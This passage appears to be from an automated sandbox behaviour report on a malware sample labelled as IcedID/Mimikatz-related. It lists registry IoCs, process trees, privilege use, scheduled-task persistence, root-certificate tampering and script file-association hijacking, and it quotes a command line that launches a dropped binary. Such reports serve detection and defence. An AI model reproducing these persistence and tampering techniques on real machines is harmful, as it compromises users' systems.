\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ztkhemnnz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nmtkkif.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wwgkke.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2828 cmd.exe 2884 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0008000000016d41-5.dat nsis_installer_2 behavioral1/files/0x0009000000016db3-15.dat nsis_installer_1 behavioral1/files/0x0009000000016db3-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" nmtkkif.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs nmtkkif.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nmtkkif.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{E1F1C4A7-1A9D-4D95-8963-2CEDDA97378C}\WpadNetworkName = "Network 3" nmtkkif.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software etdhzaten.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates nmtkkif.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump etdhzaten.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-09-82-aa-93-0f nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump etdhzaten.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals etdhzaten.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" etdhzaten.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 nmtkkif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{E1F1C4A7-1A9D-4D95-8963-2CEDDA97378C}\WpadDecision = "0" nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" etdhzaten.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs nmtkkif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" nmtkkif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" etdhzaten.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nmtkkif.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0064000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-09-82-aa-93-0f\WpadDetectedUrl nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs nmtkkif.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-09-82-aa-93-0f\WpadDecisionTime = 308cbd089afcda01 nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root nmtkkif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates nmtkkif.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump etdhzaten.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" nmtkkif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ nmtkkif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" nmtkkif.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 nmtkkif.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 nmtkkif.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2884 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2860 schtasks.exe 2836 schtasks.exe 2160 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 2600 nmtkkif.exe 1640 nmtkkif.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe Token: SeDebugPrivilege 3024 nmtkkif.exe Token: SeDebugPrivilege 2596 nmtkkif.exe Token: SeDebugPrivilege 1628 vfshost.exe Token: SeAuditPrivilege 2564 svchost.exe Token: SeDebugPrivilege 2368 etdhzaten.exe Token: SeShutdownPrivilege 2368 etdhzaten.exe Token: SeLockMemoryPrivilege 2228 tcnepb.exe Token: SeLockMemoryPrivilege 2228 tcnepb.exe Token: SeDebugPrivilege 2444 etdhzaten.exe Token: SeShutdownPrivilege 2444 etdhzaten.exe Token: SeDebugPrivilege 3024 etdhzaten.exe Token: SeShutdownPrivilege 3024 etdhzaten.exe Token: SeDebugPrivilege 1904 etdhzaten.exe Token: SeShutdownPrivilege 1904 etdhzaten.exe Token: SeDebugPrivilege 2660 etdhzaten.exe Token: SeShutdownPrivilege 2660 etdhzaten.exe Token: SeDebugPrivilege 2776 etdhzaten.exe Token: SeShutdownPrivilege 2776 etdhzaten.exe Token: SeDebugPrivilege 1060 etdhzaten.exe Token: SeShutdownPrivilege 1060 etdhzaten.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe 3024 nmtkkif.exe 3024 nmtkkif.exe 2596 nmtkkif.exe 2596 nmtkkif.exe 1972 xohudmc.exe 828 wwgkke.exe 2600 nmtkkif.exe 2600 nmtkkif.exe 1640 nmtkkif.exe 1640 nmtkkif.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2828 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe 30 PID 2372 wrote to memory of 2828 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe 30 PID 2372 wrote to memory of 2828 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe 30 PID 2372 wrote to memory of 2828 2372 20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe 30 PID 2828 wrote to memory of 2884 2828 cmd.exe 32 PID 2828 wrote to memory of 2884 2828 cmd.exe 32 PID 2828 wrote to memory of 2884 2828 cmd.exe 32 PID 2828 wrote to memory of 2884 2828 cmd.exe 32 PID 2828 wrote to memory of 3024 2828 cmd.exe 33 PID 2828 wrote to memory of 3024 2828 cmd.exe 33 PID 2828 wrote to memory of 3024 2828 cmd.exe 33 PID 2828 wrote to memory of 3024 2828 cmd.exe 33 PID 2596 wrote to memory of 2024 2596 nmtkkif.exe 35 PID 2596 wrote to memory of 2024 2596 nmtkkif.exe 35 PID 2596 wrote to memory of 2024 2596 nmtkkif.exe 35 PID 2596 wrote to memory of 2024 2596 nmtkkif.exe 35 PID 2024 wrote to memory of 1488 2024 cmd.exe 37 PID 2024 wrote to memory of 1488 2024 cmd.exe 37 PID 2024 wrote to memory of 1488 2024 cmd.exe 37 PID 2024 wrote to memory of 1488 2024 cmd.exe 37 PID 2024 wrote to memory of 2736 2024 cmd.exe 38 PID 2024 wrote to memory of 2736 2024 cmd.exe 38 PID 2024 wrote to memory of 2736 2024 cmd.exe 38 PID 2024 wrote to memory of 2736 2024 cmd.exe 38 PID 2024 wrote to memory of 2624 2024 cmd.exe 39 PID 2024 wrote to memory of 2624 2024 cmd.exe 39 PID 2024 wrote to memory of 2624 2024 cmd.exe 39 PID 2024 wrote to memory of 2624 2024 cmd.exe 39 PID 2024 wrote to memory of 2636 2024 cmd.exe 40 PID 2024 wrote to memory of 2636 2024 cmd.exe 40 PID 2024 wrote to memory of 2636 2024 cmd.exe 40 PID 2024 wrote to memory of 2636 2024 cmd.exe 40 PID 2024 wrote to memory of 2460 2024 cmd.exe 41 PID 2024 wrote to memory of 2460 2024 cmd.exe 41 PID 2024 wrote to memory of 2460 2024 cmd.exe 41 PID 2024 wrote to memory of 2460 2024 cmd.exe 41 PID 2024 wrote to memory of 2184 2024 cmd.exe 42 PID 2024 wrote to memory of 2184 2024 cmd.exe 42 PID 2024 wrote to memory of 2184 2024 cmd.exe 42 PID 2024 wrote to memory of 2184 2024 cmd.exe 42 PID 2596 wrote to memory of 1652 2596 nmtkkif.exe 43 PID 2596 wrote to memory of 1652 2596 nmtkkif.exe 43 PID 2596 wrote to memory of 1652 2596 nmtkkif.exe 43 PID 2596 wrote to memory of 1652 2596 nmtkkif.exe 43 PID 2596 wrote to memory of 2124 2596 nmtkkif.exe 45 PID 2596 wrote to memory of 2124 2596 nmtkkif.exe 45 PID 2596 wrote to memory of 2124 2596 nmtkkif.exe 45 PID 2596 wrote to memory of 2124 2596 nmtkkif.exe 45 PID 2596 wrote to memory of 2988 2596 nmtkkif.exe 47 PID 2596 wrote to memory of 2988 2596 nmtkkif.exe 47 PID 2596 wrote to memory of 2988 2596 nmtkkif.exe 47 PID 2596 wrote to memory of 2988 2596 nmtkkif.exe 47 PID 2596 wrote to memory of 1484 2596 nmtkkif.exe 49 PID 2596 wrote to memory of 1484 2596 nmtkkif.exe 49 PID 2596 wrote to memory of 1484 2596 nmtkkif.exe 49 PID 2596 wrote to memory of 1484 2596 nmtkkif.exe 49 PID 1484 wrote to memory of 2628 1484 cmd.exe 51 PID 1484 wrote to memory of 2628 1484 cmd.exe 51 PID 1484 wrote to memory of 2628 1484 cmd.exe 51 PID 1484 wrote to memory of 2628 1484 cmd.exe 51 PID 1484 wrote to memory of 2628 1484 cmd.exe 51 PID 1484 wrote to memory of 2628 1484 cmd.exe 51 PID 1484 wrote to memory of 2628 1484 cmd.exe 51 PID 2628 wrote to memory of 1720 2628 wpcap.exe 52
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:552
-
C:\Windows\TEMP\fzgiinhng\tcnepb.exe"C:\Windows\TEMP\fzgiinhng\tcnepb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Users\Admin\AppData\Local\Temp\20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\20240901c75c95da4d5c6642a99c8397eecde2d2hacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mtbebkte\nmtkkif.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2884
-
-
C:\Windows\mtbebkte\nmtkkif.exeC:\Windows\mtbebkte\nmtkkif.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3024
-
-
-
C:\Windows\mtbebkte\nmtkkif.exeC:\Windows\mtbebkte\nmtkkif.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2596 -
